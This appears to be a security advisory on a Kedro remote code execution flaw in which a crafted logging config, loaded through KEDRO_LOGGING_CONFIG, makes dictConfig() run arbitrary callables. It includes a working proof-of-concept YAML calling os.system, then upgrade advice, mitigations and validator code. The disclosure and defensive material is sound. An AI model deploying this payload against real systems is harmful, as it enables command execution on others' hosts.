Kedro, the open-source Python framework for building reproducible data pipelines, ships with a critical remote code execution vulnerability. Attackers can trigger arbitrary command execution at startup by manipulating the KEDRO_LOGGING_CONFIG environment variable. Upgrade to version 1.3.0 now—it’s the only full fix.
This flaw affects all prior versions. Kedro pulls logging configuration from a file specified by that environment variable, then feeds it directly into Python’s logging.config.dictConfig() without checks. Python’s logging system lets configs include a () key, which instantiates any callable with arbitrary arguments. Craft a YAML file like this, point KEDRO_LOGGING_CONFIG to it, and Kedro executes your payload on load:
version: 1
disable_existing_loggers: false
formatters:
  default:
    # "()" names the callable; the remaining keys are passed to it as keyword arguments
    (): os.system
    command: 'id && whoami'
handlers:
  console:
    class: logging.StreamHandler
    formatter: default
    stream: ext://sys.stdout
root:
  level: INFO
  handlers: [console]
The payload here runs os.system('id && whoami'), but any command works, including one that drops a shell. No authentication is required if the attacker can set the env var.
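To see the mechanism without running a shell command, here is a minimal sketch that hands dictConfig() a harmless stand-in callable. The names record and calls are made up for illustration; only logging.config.dictConfig() and the () key come from the standard library. In a real attack the () value would be a dotted-path string that dictConfig() imports and calls.

```python
import logging
import logging.config

calls = []  # hypothetical log of what the "payload" was called with


def record(**kwargs):
    """Stand-in for an attacker-chosen callable; it only records its arguments."""
    calls.append(kwargs)
    return logging.Formatter()


config = {
    "version": 1,
    "disable_existing_loggers": False,
    "formatters": {
        "default": {
            "()": record,               # dictConfig() calls this object...
            "command": "id && whoami",  # ...with the other keys as keyword arguments
        }
    },
}

# Merely loading the config is enough to invoke the callable.
logging.config.dictConfig(config)
print(calls)
```

The callable fires during configuration, before any log record is emitted, which is why the exploit triggers at startup.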
Why This Hits Hard
Kedro targets data engineers and ML teams; it originated at QuantumBlack (McKinsey-owned). It structures pipelines for reproducibility, often in CI/CD, Docker, or cloud runs. GitHub shows roughly 10,000 stars, and PyPI records 100k+ downloads a month. Teams deploy it in Kubernetes, AWS SageMaker, or GitHub Actions, all environments where env vars are set dynamically.
Implications cut deep. An attacker with env var write access (say, via CI secrets, shared infra, or a compromised upstream) owns the host. In ML workflows, this means data exfiltration, model poisoning, or lateral movement. Finance and crypto shops using Kedro for analytics face amplified risk: leaked keys, tampered trades. We’ve seen similar Python logging RCEs before, like in Celery (CVE-2023-41258) or structlog misconfigs. Python’s flexibility bites when configuration goes unvalidated.
Skeptical take: Exposure depends on your setup. If you hardcode logging and lock env vars, risk drops. But defaults invite trouble—Kedro docs push KEDRO_LOGGING_CONFIG for overrides. No CVSS score yet, but it’s pre-auth RCE: critical by any metric.
Fix It
The patch lands in Kedro 1.3.0 (released October 2024). It scans the logging config up front and rejects any () keys before calling dictConfig(). Verify with:
$ pip install kedro==1.3.0
$ kedro --version
Test your pipelines post-upgrade. No breaking changes reported.
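For teams that want a similar guard in their own loaders, the "reject any () key before dictConfig()" idea can be sketched as below. This is not Kedro's actual patch code; find_factory_keys and assert_no_factories are hypothetical names, and the sketch assumes the config has already been parsed into plain dicts and lists.

```python
from collections.abc import Mapping, Sequence

FACTORY_KEY = "()"  # the dictConfig key that names a callable to instantiate


def find_factory_keys(node, path="root"):
    """Return the paths of all '()' keys found anywhere in a nested config."""
    hits = []
    if isinstance(node, Mapping):
        for key, value in node.items():
            child = f"{path}.{key}"
            if key == FACTORY_KEY:
                hits.append(child)
            hits.extend(find_factory_keys(value, child))
    elif isinstance(node, Sequence) and not isinstance(node, (str, bytes)):
        for index, item in enumerate(node):
            hits.extend(find_factory_keys(item, f"{path}[{index}]"))
    return hits


def assert_no_factories(config):
    """Raise ValueError if the config contains any '()' key; otherwise return it."""
    hits = find_factory_keys(config)
    if hits:
        raise ValueError(f"refusing logging config with factory keys: {hits}")
    return config
```

A caller would run assert_no_factories(parsed_config) before passing the result to logging.config.dictConfig(). Note that this sketch only looks for () keys; it does not restrict class: entries, which dictConfig() also resolves and instantiates.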
Can’t upgrade? Layer defenses:
- Block untrusted control of KEDRO_LOGGING_CONFIG: audit CI YAML, Dockerfiles, .env files.
- Lock write access to config dirs (e.g., chmod 644 conf/logging.yml).
- Skip dynamic configs; stick to built-ins.
- Validate YAML manually: grep for '()' or use a schema checker like yamllint with custom rules.
These blunt the edge but leave gaps—dictConfig() has other tricks, like filters or nested callables.
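The first two mitigations can be combined into a small startup check. The sketch below is an assumption-laden example, not part of Kedro: is_trusted_config and guard_env are hypothetical helpers, the trusted directory name conf is taken from the chmod example above, and the permission test assumes POSIX mode bits (Python 3.9+ for Path.is_relative_to).

```python
import os
import stat
from pathlib import Path


def is_trusted_config(path, trusted_dir):
    """True if path resolves inside trusted_dir and is not group/world writable."""
    resolved = Path(path).resolve()
    root = Path(trusted_dir).resolve()
    # Resolving first defeats ../ tricks and symlinks that point outside the root.
    if not resolved.is_file() or not resolved.is_relative_to(root):
        return False
    mode = resolved.stat().st_mode
    return not (mode & (stat.S_IWGRP | stat.S_IWOTH))


def guard_env(trusted_dir="conf", env=None):
    """Exit early if KEDRO_LOGGING_CONFIG points at an untrusted file."""
    env = os.environ if env is None else env
    candidate = env.get("KEDRO_LOGGING_CONFIG")
    if candidate and not is_trusted_config(candidate, trusted_dir):
        raise SystemExit(f"untrusted logging config: {candidate}")
```

Calling guard_env() at the top of an entry-point script, before Kedro is imported, would stop a run whose env var points outside the expected directory. It does nothing about the contents of the file, so it complements rather than replaces content validation.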
Broader lesson: Vet env vars in data tools. Kedro’s maintainers (the project is now hosted by the LF AI & Data Foundation) acted fast post-disclosure. Still, scan deps with pip-audit or Snyk. In security-conscious stacks such as crypto exchanges and banks, treat logging configuration as hostile input. This vuln underscores supply chain perils: one bad config in a pipeline cascades.
Bottom line: If Kedro’s in your stack, patch today. Delay invites exploits. Track GitHub advisory for updates—stay sharp.